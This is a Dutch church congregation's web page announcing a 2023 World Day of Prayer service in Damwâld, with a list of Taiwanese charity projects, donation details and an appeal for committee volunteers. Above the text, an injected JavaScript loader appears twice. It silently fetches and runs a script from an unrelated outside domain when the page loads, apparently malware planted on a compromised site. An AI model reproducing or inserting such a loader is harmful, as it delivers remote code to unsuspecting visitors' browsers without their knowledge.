;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Viering Wereldgebedsdag in Damwâld - PKN Damwâld

Viering Wereldgebedsdag in Damwâld

Gepubliceerd op: dinsdag 21 februari 2023

De wereldgebedsdag commissie Damwoude gaat deze viering ook weer vieren op vrijdag 3 maart om 19:30 in de Doopsgezinde kerk in Damwâld. Het thema van deze dienst is: “Zichtbaar Geloven”. Tijdens de dienst wordt een collecte gehouden en vragen we om een bijdrage aan de projecten van dit jaar en voor vergoeding van de gemaakte onkosten. Helaas kunt u GEEN gebruik maken van u collectebonnen.

Dit jaar zijn de projecten van Wereldgebedsdag:
– Changhua Children’s home.
– Taipei Homeless Caring Entre.
– Taiwan Women’s development Association.
– Angel Tree Project Prison fellowship Taiwan.
– The Single Parent Educational Foundation.
– Light up a candle.

Hopelijk steunt u ons zodat we dit jaar weer een mooi en groot bedrag kunnen overmaken wilt u meer over de projecten weten vraag dan gerust om meer info. Wilt u geld overmaken dan kan dit door u gift te sturen naar: Diaconie Hervormde Kerk Damwoude rekeningnummer NL46RABO0343305119 met omschrijving “Wereldgebedsdienst 2023 Taiwan”. Let op! … Dit is een ander rekeningnummer dan voorgaande jaren. Bij voorbaat dank alvast voor u bijdrage.

Graag brengen wij als commissie u ook op de hoogte dat ons comité nu uit 3 personen bestaat. Dit is een grote belasting en we zouden dan ook graag zien dat er commissieleden bij komen. We vragen u dat al een aantal jaren maar de nood is nu echt erg hoog bij ons. Net zoals vorig jaar zijn tips om nieuwe commissieleden te krijgen van harte welkom. Heeft u interesse en wilt u ook dat wereldgebedsdag doorblijft gaan meldt u aan of vraag om meer uitleg.

We hopen op u steun en zien u graag terug tijdens de dienst.

Met vriendelijke groet,
Namens de plaatselijke commissie, Lourenske Herrema, tel: 0511-702643

Zie ook eens op onze facebooksite: www.facebook.com/wgddamwoude